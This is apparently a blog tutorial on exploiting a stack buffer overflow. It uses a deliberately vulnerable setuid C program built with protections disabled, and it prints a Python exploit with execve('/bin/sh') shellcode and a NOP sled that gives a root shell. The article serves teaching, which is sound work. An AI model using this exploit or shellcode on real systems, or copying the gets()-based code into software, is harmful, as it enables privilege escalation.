Buffer Overflow - Shellcode

Introduction

In my article on Introduction to Buffer Overflow, we explored exploiting a Buffer Overflow vulnerability to commandeer the instruction pointer. This led us to redirect the program's execution flow to a different function not originally called within our program.

However, since it was a basic illustration of Buffer Overflow, we didn't achieve any significant exploitation potential. Today, we'll delve into the Shellcode technique, focusing on exploiting buffer overflow to gain system access or potentially escalate privileges.

What is Shellcode?

Shellcode is a small piece of code typically written in assembly language that is injected into a vulnerable program's memory during a buffer overflow attack. This code is designed to exploit the vulnerability and execute specific actions, often granting the attacker unauthorized access to the system or allowing them to execute arbitrary commands. Shellcode is called "shellcode" because it commonly spawns a command shell (such as a Unix shell or a Windows command prompt) for the attacker to interact with, hence giving them control over the compromised system.

ShellCode in Stack-Based Buffer Overflow

Exploiting a Buffer Overflow with shellcode involves controlling the return pointer (Instruction Pointer) to point to a section in the stack where the malicious instructions were placed.

As you have seen in the Introduction to Buffer Overflow article, when you overflow the stack, you commonly reach the return address. This address was placed when the vulnerable function was called and is the address where the program will return after executing the ret instruction. The attacker, through the buffer overflow, modifies this address to control the Instruction Pointer to any address they want, thereby controlling the program flow.

When the attacker aims to exploit this technique, they create a malicious payload that overwrites the return address with one specified by the attacker, while also embedding crafted shellcode onto the stack. The altered return address directs the program execution flow to the beginning of the shellcode, strategically placed by the attacker on the stack. This necessitates that the attacker possess knowledge of stack addresses before finalizing their payload.

Let's see this graphically:

I'll explain this image so that you can understand the attack representation well.

On the left, there are decimal numbers representing memory addresses within the stack. The word "data" signifies random data stored on the stack.

On the right, there are texts, each indicating a section on the stack containing the described data. For instance, the text "user input" points to the section on the stack where user input is stored.

The decimal numbers stored within the stack, such as the one pointed to by the text "Return Address", are also memory addresses. In the case of "return address", it holds the memory address (10) to which the program will return.

Let's see what happens if the user enters a large string:

As you can see, the stack has been overflowed, including important saved values such as the Return Address and the Saved EBP. Now, if the function returns, meaning the ret instruction is executed and pops the saved return address value, the program will attempt to point to the memory address 0x41414141 (the string "AAAA" in hexadecimal), which will inevitably crash the program.

Once the attacker realizes they can overwrite the return address with a custom one, they should assess which protections the binary incorporates. Exploiting a buffer overflow using shellcode requires that the NX (No eXecute) protection be disabled. Remember that NX protection prevents certain sections of the binary from being interpreted as instructions. In this scenario, the attacker controls the stack. If the attacker redirects the return pointer to a section of the stack where they've placed malicious instructions, and the NX protection is disabled, those instructions will be executed. Otherwise, if the NX protection is enabled, those instructions won't execute, and the program will crash.

In the event the NX protection is disabled, the attacker should do the following:

Firstly, they have to understand the addresses of the stack, including where the return pointer is overwritten and where their shellcode is placed on the stack. Once they identify where the shellcode begins on the stack, they need to place that address in the return address. This way, when the function returns, the malicious address is placed in the Instruction Pointer, and the program flow continues from the beginning of the shellcode.

Let's see this process graphically:

As observed, the attacker successfully overflowed the stack. They created a carefully designed payload to overwrite the return address with the address 36 and then to place the shellcode on the stack. Now, when the function returns, the program flow will continue from address 36, which indeed holds the beginning of the shellcode on the stack.

Practice

Let's attempt to exploit a buffer overflow by abusing this technique. Since this is a simple demonstration of how attackers can exploit a buffer overflow using shellcode, we'll disable every binary protection to make it simpler.

Firstly, let's disable the ASLR protection:

root@ubuntu$ echo 0 > /proc/sys/kernel/randomize_va_space

You can activate it later by either entering "2" as the value in that file or by restarting the system.

C Program:

#include <stdio.h>
#include <stdlib.h>

// Compile: gcc program.c -o program -no-pie -fno-stack-protector -z execstack -m32



void vulnFunction(){

  char username[20];

  printf("Please, enter your username: ");
  gets(username);

  printf("Hello, %s", username);
  
}

int main(){
  vulnFunction();
  return 0; 
}

Let's compile it using gcc:

elswix@ubuntu$ gcc program.c -o program -no-pie -fno-stack-protector -z execstack -m32

Let's switch the ownership of this file to root and set it as Set-UID. This way, we can later elevate privileges when exploiting it:

elswix@ubuntu$ sudo chown root:root program
elswix@ubuntu$ sudo chmod u+s program

Once the program is ready, let's execute it:

elswix@ubuntu$ ./program
Please, enter your username: elswix
Hello, elswix

As you can see, the program asks for a username and then prints it back to the stdout.

Let's see what happens if we enter a very large string in order to trigger a buffer overflow.

elswix@ubuntu$ ./program
Please, enter your username: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
zsh: segmentation fault (core dumped)  ./program
elswix@ubuntu$

As observed, the program has crashed. This indicates that we overflowed the stack and overwrote the return address, causing the program to attempt to return to an address such as 0x41414141 (the string "AAAA" in hexadecimal), which of course it couldn't.

Let's use gdb to perform a thorough examination of the program's behavior:

elswix@ubuntu$ gdb -q program
GEF for linux ready, type `gef' to start, `gef config' to configure
88 commands loaded and 5 functions added for GDB 12.1 in 0.00ms using Python engine 3.10
Reading symbols from program...
(No debugging symbols found in program)
gef$

By the way, I'm using the GDB Enhanced Features (GEF) extension for GDB, as it provides enhancements to the original GDB.

Let's execute this program using the gdb command r, and then enter a large string:

gef$ run
Starting program: /home/elswix/Desktop/elswix/Local/bufferoverflow-article/shellcode/program 
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
Please, enter your username: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
gef$

As observed, our string has overwritten several registers, including the Instruction Pointer. This is because we have overflowed the stack, and some registers store their previous values there. When the function returns, these stored values are overwritten, consequently, allowing user-controlled values to be popped.

The most interesting value to overwrite is the return address, since when the function returns, this value is popped into the EIP register, allowing us to control the Instruction Pointer, and consequently, the program flow.

So far, we know that we can control the instruction pointer by overwriting the return address on the stack. However, we don't know how many characters we have to enter prior to starting overwriting the return address. As explained in my Introduction to Buffer Overflow article, an attacker could create a pattern string. Then, when it overwrites the return address, they can examine the value of the instruction pointer and compare it with their pattern string to determine where the overwrite occurred.

For instance, imagine the attacker enter a string like this:

AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMM

This is a pattern string. When you enter it and the program tries to return to an address like 0x49494949, you'll notice that the return address was overwritten where the characters IIII were entered. This helps you identify where to place malicious addresses to control the program flow.

GEF contains a useful tool to automate this process. Firstly, let's create a pattern with the command pattern create:

gef$ pattern create 100
[+] Generating a pattern of 100 bytes (n=4)
aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaa
[+] Saved as '$_gef1'
gef$

Then, let's execute the program and enter the generated string as input:

gef$ run
Starting program: /home/elswix/Desktop/elswix/Local/bufferoverflow-article/shellcode/program 
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
Please, enter your username: aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaa

Program received signal SIGSEGV, Segmentation fault.
0x61616169 in ?? ()
gef$

As you can see, the instruction pointer (EIP) holds the string 0x61616169 (the string "iaaa" in hexadecimal). This indicates that the return address was overwritten when we entered the string iaaa.

To calculate how many characters we need to enter to reach the return address, since we entered the pattern string generated by gef, we can use the command pattern offset $eip to determine the number of characters required before overwriting the return address.

gef$ pattern offset $eip
[+] Searching for '69616161'/'61616169' with period=4
[+] Found at offset 32 (little-endian search) likely
gef$

As observed, we need to enter 32 characters before overwriting the return address.

Let's verify if this is true by creating a string of 32 'A' characters followed by 4 'B' characters:

gef$ run <<< $(python -c 'print("A"*32 + "B"*4)')

Starting program: /home/elswix/Desktop/elswix/Local/bufferoverflow-article/shellcode/program <<< $(python -c 'print("A"*32 + "B"*4)')
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".

Program received signal SIGSEGV, Segmentation fault.
0x42424242 in ?? ()
gef$

It worked! We overwrote the EIP with the string "BBBB". This indicates that we need to enter 32 bytes (characters) before overwriting the return address.

To successfully exploit this buffer overflow using ShellCode, we firstly need to determine where to place it. Since we control the stack, we can position it there and redirect the instruction pointer to the start of our shellcode.

In theory, the stack pointer should indicate the data we insert into our payload after the return address. To verify this, let's add some stuff after the return address:

python -c 'print("A"*32 + "B"*4 + "C"*16)'

gef$  run <<< $(python -c 'print("A"*32 + "B"*4 + "C"*16)')
Starting program: /home/elswix/Desktop/elswix/Local/bufferoverflow-article/shellcode/program <<< $(python -c 'print("A"*32 + "B"*4 + "C"*16)')
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".

Program received signal SIGSEGV, Segmentation fault.
0x42424242 in ?? ()

As evident, the stack pointer now points to the data we've entered after the return address. Consequently, we could replicate the stack pointer address and set it as the return address. Thus, upon function return, the instruction pointer will point to the stack pointer address, where are located our "C" characters.

Why do this? Well, during binary compilation, we disabled the NX (No eXecute) protection, allowing executable sections like the stack. By injecting malicious instructions (shellcode) into the stack and directing the instruction pointer to this specific area, those instructions will be executed, leading to code execution.

As depicted in the image, the stack pointer address was 0xffffcfa0, pointing to our C characters placed after the return address. This indicates that we can redirect the instruction pointer to this address, allowing us to insert our malicious instructions (shellcode) in place of those C characters. Therefore, when the instruction pointer reaches these instructions, they will be executed.

To verify the execution of malicious instructions inserted on the stack, I'll use INT 3 instructions.

The INT 3 instruction is a software interrupt primarily used for debugging. When executed, it triggers an interrupt, typically causing the program to halt and transfer control to a debugger. This enables developers to inspect the program's state, memory, and execution flow at that point. It's commonly used for setting breakpoints in code to facilitate debugging.

This means that when the instruction pointer reaches the INT 3 instruction, the program will trigger an interrupt, causing it to enter debugging mode, similar to when using GDB.

The payload is constructed as follows:

python -c 'import sys; sys.stdout.buffer.write(b"A"*32 + b"\xa0\xcf\xff\xff" + b"\xCC"*12)'

Let's break down this payload step by step.

Firstly, we're using sys.stdout.buffer.write to print non-printable bytes, a technique I explained in detail in my article on Introduction to Buffer Overflow.

The payload starts by printing 32 characters, causing a stack overflow to reach the return address. Then, we insert the address 0xffffcfa0 in little-endian format. This address points to the stack immediately following the return address, where we previously placed our "C" characters. By inserting this address as the return address, the program will resume execution from 0xffffcfa0 when the function returns.

After the return address, we add 12 INT 3 (\xCC) instructions. These instructions are placed on the stack. As a result, when the function returns to 0xffffcfa0, the instruction pointer will point to this address, initiating the execution of the instructions on the stack.

If the exploitation is successful, the program flow will resume from the address 0xffffcfa0 on the stack, where our INT 3 instructions are located.

Let's execute the program and enter our payload:

gef$ run <<< $(python -c 'import sys; sys.stdout.buffer.write(b"A"*32 + b"\xa0\xcf\xff\xff" + b"\xCC"*12)')
Starting program: /home/elswix/Desktop/elswix/Local/bufferoverflow-article/shellcode/program <<< $(python -c 'import sys; sys.stdout.buffer.write(b"A"*32 + b"\xa0\xcf\xff\xff" + b"\xCC"*12)')
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".

Program received signal SIGTRAP, Trace/breakpoint trap.
0xffffcfa1 in ?? ()
gef$

Great! The execution has now reached our INT 3 instructions, as indicated by the message "Trace/breakpoint trap," which initiates debugging mode and halts execution. Essentially, we're currently executing the instructions we placed on the stack by controlling the instruction pointer and directing it to those instructions.

So far, we achieved execution of controlled instructions. Now, let's try to escalate our privileges and get a shell as the root user.

Given that the binary is setuid, each instruction executes with the privileges of the binary owner, which in this case is root. To gain root-level execution, we have two options: creating our own shellcode or utilizing pre-existing shellcode developed by others. The latter approach is often preferred as it allows us to utilize shellcode that has been tested and proven to work reliably.

There are websites, such as Shell-Storm, which offer pre-created shellcode, enabling us to execute commands and perform various tasks. My objective is to execute a shellcode that grants me a root shell, essentially executing the following code:

execve("/bin/sh",0,0);

As the binary is setuid and owned by root, one might assume that executing this instruction would grant us a root shell. However, it's not that simple. Before spawning a shell as the root user (/bin/sh), we need to execute the setuid(0) instruction to set all user IDs to root. This step is necessary even though the program is executed with the effective user ID (EUID) of root. For a deeper understanding of why this is essential, I recommend reading my article on Understanding Linux User IDs.

In this scenario, there's no issue with using the setuid() function, as there are pre-created shellcodes available that incorporate it before employing execve() to launch /bin/sh. For this purpose, I've selected the following shellcode:

char shellcode[] =
                                // <_start>:
    "\x31\xdb"                  // xor    %ebx,%ebx
    "\x6a\x17"                  // push   $0x17
    "\x58"                      // pop    %eax
    "\xcd\x80"                  // int    $0x80
    "\xf7\xe3"                  // mul    %ebx
    "\xb0\x0b"                  // mov    $0xb,%al
    "\x31\xc9"                  // xor    %ecx,%ecx
    "\x51"                      // push   %ecx
    "\x68\x2f\x2f\x73\x68"      // push   $0x68732f2f
    "\x68\x2f\x62\x69\x6e"      // push   $0x6e69622f
    "\x89\xe3"                  // mov    %esp,%ebx
    "\xcd\x80"                  // int    $0x80
;

For convenience, I've opted to create a Python script to generate our payload:

import sys 


offset = 32
junk = b"A"*offset

EIP = b"\xa0\xcf\xff\xff"


buf = b""


# https://shell-storm.org/shellcode/files/shellcode-516.html

buf += b"\x31\xdb"                  # xor    %ebx,%ebx
buf += b"\x6a\x17"                  # push   $0x17
buf += b"\x58"                      # pop    %eax
buf += b"\xcd\x80"                  # int    $0x80
buf += b"\xf7\xe3"                  # mul    %ebx
buf += b"\xb0\x0b"                  # mov    $0xb,%al
buf += b"\x31\xc9"                  # xor    %ecx,%ecx
buf += b"\x51"                      # push   %ecx
buf += b"\x68\x2f\x2f\x73\x68"      # push   $0x68732f2f
buf += b"\x68\x2f\x62\x69\x6e"      # push   $0x6e69622f
buf += b"\x89\xe3"                  # mov    %esp,%ebx
buf += b"\xcd\x80"                  # int    $0x80


payload = junk + EIP + buf


sys.stdout.buffer.write(payload)

When running the program again and providing our new payload containing the shellcode, everything executes correctly:

gef$ run <<< $(python bofexploit.py)
Starting program: /home/elswix/Desktop/elswix/Local/bufferoverflow-article/shellcode/program <<< $(python bofexploit.py)
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".

process 21752 is executing new program: /usr/bin/dash

[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
[Inferior 1 (process 21752) exited normally]
gef$

Indeed, as seen in GDB, the execve() function was executed as expected. Of course, all of this occurred within GDB. Now, let's observe what happens when the program runs outside of GDB:

elswix@ubuntu$ ./program <<< $(python bofexploit.py)
zsh: segmentation fault (core dumped)  ./program <<< $(python bofexploit.py)

That's not what I expected. Why didn't it work?

This is because the addresses of the stack differ from GDB. But why, if we disabled ASLR? Actually, it's not a problem of relocation; it's a problem with the contents within the stack. As you may know, the stack also stores environment variables when executing a program, and outside of GDB, they may differ, causing our payload to be moved to other addresses. There are also other data which may affect those addresses.

To address this issue, we have a couple of options. One approach is to use env -i when executing the program, which clears all environment variables, preventing the stack from being populated with them. Another method is to use NOPS (No Operation) to pad the payload.

NOP (no operation) instructions perform no action, as implied by their name. This characteristic makes them particularly valuable in shellcode exploits because they merely execute the subsequent instruction. By inserting NOPs on the left side of our exploits and directing the EIP (instruction pointer) to the middle of them, the processor will continue executing no operations until it reaches our intended shellcode. This approach provides a wider margin for error; slight shifts in byte placement forward or backward will not significantly impact the execution, as it will only result in a different number of NOP instructions being executed. This technique of padding with NOPs is commonly referred to as a NOP slide or NOP sled, as the EIP effectively "slides" down these no-operation instructions.

Let's modify our script:

import sys 


offset = 32
junk = b"A"*offset

EIP = 0xffffcfa0+300
EIP = EIP.to_bytes(4, "little")


...[snip]...
payload = junk + EIP + b"\x90"*100 + buf
sys.stdout.buffer.write(payload)

I've made some changes. First, I adjusted the stack address where the instruction pointer goes back to. I added 300 bytes because, outside of GDB, environment variables may differ. Without adding more bytes, the instruction pointer might not reach our payload. This is because the address is too small, especially outside of GDB. Also, I included NOPs because even though I added 300 bytes, we're not certain if that's where our shellcode starts. NOPs help us move through the stack until we find the shellcode reliably.

Now, when executing it, no errors are encountered.

elswix@ubuntu$ ./program <<< $(python bofexploit.py)
elswix@ubuntu$

But why didn't we obtain a shell with "/bin/sh"? Well, there's an explanation for this. I found this Stack Overflow question which explains this behavior. The problem arises when the standard input ends after the program execution. The solution is to use cat:

"This way you ensure that your program's standard input doesn't end after what echo outputs. Instead, cat continues to supply input to your program. The source of that subsequent input is your terminal since this is where cat reads from."

Let's test to see if it works:

elswix@ubuntu$ (python bofexploit.py; cat) | ./program
whoami
whoami
root
id
uid=0(root) gid=1000(elswix) groups=1000(elswix),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),122(lpadmin),135(lxd),136(sambashare)
^C
elswix@ubuntu$

It worked! We've successfully achieved command execution as root, effectively exploiting the buffer overflow vulnerability.

Conclusion

In conclusion, the Shellcode technique is very useful when exploiting buffer overflows, especially when abusing the NX protection being disabled. However, in the wild, this is not that common, so in those cases, you should opt for other techniques.

In upcoming articles, we'll delve into bypassing protections such as ASLR and NX, involving the Return to Libc technique. Additionally, I'll create an article where we'll develop our own shellcode and return to this program to try it out.

I hope you learned something new from this article.

Happy Hacking!

References

https://ir0nstone.gitbook.io/notes/types/stack/nops

https://ir0nstone.gitbook.io/notes/types/stack/no-execute

https://ir0nstone.gitbook.io/notes/types/stack/shellcode

https://ir0nstone.gitbook.io/notes/types/stack/aslr

https://elswix.github.io/articles/5/introduction-to-buffer-overflow.html

https://elswix.github.io/articles/4/binary-protections.html

https://elswix.github.io/articles/3/cpu-and-assembly-binexp-basics.html

https://elswix.github.io/articles/understanding-linux-user-ids.html

https://shell-storm.org/shellcode/files/shellcode-516.html

https://shell-storm.org/shellcode/index.html

https://stackoverflow.com/questions/8509045/execve-bin-sh-0-0-in-a-pipe